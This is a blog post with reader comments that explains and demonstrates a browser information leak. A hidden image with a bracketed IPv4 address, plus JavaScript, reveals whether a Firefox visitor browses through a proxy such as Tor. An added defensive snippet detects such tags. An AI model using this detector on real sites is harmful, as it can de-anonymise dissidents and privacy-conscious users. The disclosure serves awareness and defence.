Detect Proxy Usage in Firefox

August 22nd, 2010

I recently read about an interesting browser information leak on ha.ckers.org and decided to code up a proof-of-concept.

It allows a malicious website to use image tags to detect whether the user is browsing through a proxy. Proxies are often used by corporations, political dissidents, and privacy-conscious Internet users because they can provide additional security or anonymous Internet browsing.

Here’s how the exploit works:

Firefox uses square brackets [ ] to denote IPv6 addresses, but this notation also works to describe IPv4 addresses (I’m not sure exactly why).

So, if we embed an image with src="http://[74.207.246.197]/pic.jpg" into a page, Firefox automatically resolves [74.207.246.197] into the IP address 74.207.246.197.

However, if the user is browsing through a proxy, this automatic resolution doesn’t happen. Instead, Firefox asks the proxy to do a DNS lookup for the “domain” [74.207.246.197], which obviously fails since it’s not a valid domain name.

Most proxies don’t know how to handle the bracketed domain, so the DNS lookup fails. I’ve tested this on Tor (popular proxy for anonymous Internet browsing), PHP Proxy and CGI Proxy (the top two web-based proxies), and Proxify (popular commercial web proxy).

So, if the image fails to load, we know that the user is browsing through a proxy. Add some JavaScript to detect when the image fails to load and you’ve got a working proxy detector.

Demo
(Works in: Firefox 3+. Update: Looks like it works in Safari 5, too.)

This, of course, assumes that the user is not blocking cross-domain requests. Also, my implementation requires JavaScript to be enabled, but that’s not a necessity.

Here’s the code I wrote:

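<script type="text/javascript" charset="utf-8">
    // Called from the image's onerror handler: the bracketed-IPv4 image
    // failed to load, so show the "proxy" message and hide the default one.
    function setUsingProxy() {
        // Declared with var so they do not leak into the global scope.
        var proxy = document.getElementById('proxy');
        proxy.style.display = 'block';
        var no_proxy = document.getElementById('no_proxy');
        no_proxy.style.display = 'none';
    }
</script>

<!-- Hidden by default; revealed only when the image fails to load. -->
<div id="proxy" style="display:none;">
    You are accessing the Internet through a proxy (corporate proxy, VPN, or <a href="http://www.torproject.org/">Tor</a>).
</div>

<!-- Default message, shown while the image loads normally. -->
<div id="no_proxy">
    You are accessing the Internet directly. No proxy.
</div>

<!-- Invisible image whose host is an IPv4 address written in IPv6-style brackets. -->
<img src="http://[74.207.246.197]/organize.jpg" style="height:0;width:0;display:none;" onerror="setUsingProxy()">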

This attack only affects Firefox, as far as I can tell.
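
A defensive check for the behavior described above, as an added example that is not part of the original post: it classifies a request host the way a proxy or content filter would need to, so that a bracketed IPv4 literal is recognised as an address instead of being sent to DNS, and it flags image tags that use such a host. The function names and the sample markup (apart from the post's own image tag) are assumptions made for this illustration.

```javascript
// Added example, not code from the original post. Names are hypothetical.
const OCTET = '(25[0-5]|2[0-4]\\d|1\\d\\d|[1-9]?\\d)';
const IPV4_RE = new RegExp(`^${OCTET}(\\.${OCTET}){3}$`);

// Classify the host of a request target before any DNS lookup is attempted.
function classifyHost(host) {
  const h = String(host).trim().toLowerCase();
  if (h.startsWith('[') && h.endsWith(']')) {
    const inner = h.slice(1, -1);
    // The case from the post: an IPv4 address wrapped in IPv6-style brackets.
    if (IPV4_RE.test(inner)) return { kind: 'bracketed-ipv4', address: inner };
    // Loose IPv6 shape check (hex digits, colons, optional dotted tail).
    if (inner.includes(':') && /^[0-9a-f:.]+$/.test(inner)) {
      return { kind: 'ipv6', address: inner };
    }
    return { kind: 'invalid', address: null };
  }
  if (IPV4_RE.test(h)) return { kind: 'ipv4', address: h };
  return { kind: 'dns-name', address: null };
}

// Only 'dns-name' hosts should ever reach the resolver.
function needsDnsLookup(host) {
  return classifyHost(host).kind === 'dns-name';
}

// Heuristic scan (regex, not a full HTML parser) for <img> tags whose src
// host is a bracketed IPv4 literal, e.g. in a content filter or page audit.
function findBracketedIpv4Images(html) {
  const imgRe = /<img\b[^>]*\bsrc\s*=\s*["']?https?:\/\/(\[[^\]\/"'\s>]*\])/gi;
  const hits = [];
  for (const m of html.matchAll(imgRe)) {
    const c = classifyHost(m[1]);
    if (c.kind === 'bracketed-ipv4') hits.push(c.address);
  }
  return hits;
}

// Constructed sample markup; the first tag is the one shown in the post.
const SAMPLE_HTML = [
  '<img src="http://[74.207.246.197]/organize.jpg" onerror="setUsingProxy()">',
  '<img src="http://[2001:db8::1]/logo.png">',
  '<img src="http://192.0.2.10/banner.png">',
  '<img src="http://example.com/photo.jpg">',
].join('\n');

console.log(findBracketedIpv4Images(SAMPLE_HTML));
```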

Credit for the idea: Ha.ckers – Quick Proxy Detection


13 Comments on “Detect Proxy Usage in Firefox”

  1. 1 Suhana said at 1:20 am on August 24th, 2010:

    Oh, that’s so neat, now I just wish this were across all browsers – simple, but effective.

  2. 2 Feross Aboukhadijeh said at 3:28 pm on August 25th, 2010:

    Hi Suhana,

    I agree – this would be even cooler if it worked in all browsers. I did some more testing, and it looks like it works in Safari too!

    -Feross

  3. 3 sprrigan said at 10:49 pm on August 27th, 2010:

    Hi Feross

    it worked with IE7..

    I wasn’t using any proxy and clicked on your demo and it said I was accessing the internet directly

    good job

  4. 4 Linto said at 3:52 am on September 11th, 2010:

    This disgusts me and is an invasion of privacy.

  5. 5 Feross Aboukhadijeh said at 4:10 am on September 11th, 2010:

    I’m not recommending that anyone actually use this vulnerability. The point of this post was to prove that, whether we like it or not, this sort of attack is technically possible. So, we should be aware of it and (hopefully) fix the problem.

  6. 6 Ravi said at 7:37 am on September 13th, 2010:

    It worked wrong for me. I am accessing via proxy but it says Internet Directly. What could be the reason behind it?

  7. 7 Feross Aboukhadijeh said at 5:39 pm on September 13th, 2010:

    Are you using Firefox?

  8. 8 SAcha Yunusic said at 3:49 am on September 14th, 2010:

    Feross,

    Your code only works with Explicit Proxy, not transparent Proxy. I just tried and when I was transparent, it appears that I was directly connected to the Web, even though I’m positive I was passing thru a proxy (Transparent proxy, but proxy at the end).
    Regards,

    Sacha.

  9. 9 beta said at 2:27 pm on February 21st, 2011:

    Great trick, I combined it with the techniques I’ve used previously and it seems to integrate and work fine. The only way I’ve managed to bypass it using Firefox was when I was using my OpenVPN server as gateway to route my traffic over it.

    Thanks for the post

  10. 10 Feross Aboukhadijeh said at 12:53 am on February 22nd, 2011:

    Beta, are you using this technique in production? What are you using it for?

  11. 11 fonseka said at 1:12 am on April 6th, 2011:

    Hi!
    Some things aren’t cross browser when it comes to the web. It really is annoying. Once I worked on a way to allow users only from certain MAC addresses. But to get the MAC I needed to use WQL and it works with IE only.
    Keep up the good work, and good luck.

  12. 12 Rajesh Namase said at 10:40 am on September 15th, 2011:

    Hey, thanks for giving this code.

  13. 13 Nafeez Ahamed said at 8:33 am on September 22nd, 2011:

    If you use the CSP Headers and deliberately force a violation, most of the proxy details including the authentication credentials can be obtained by the server.

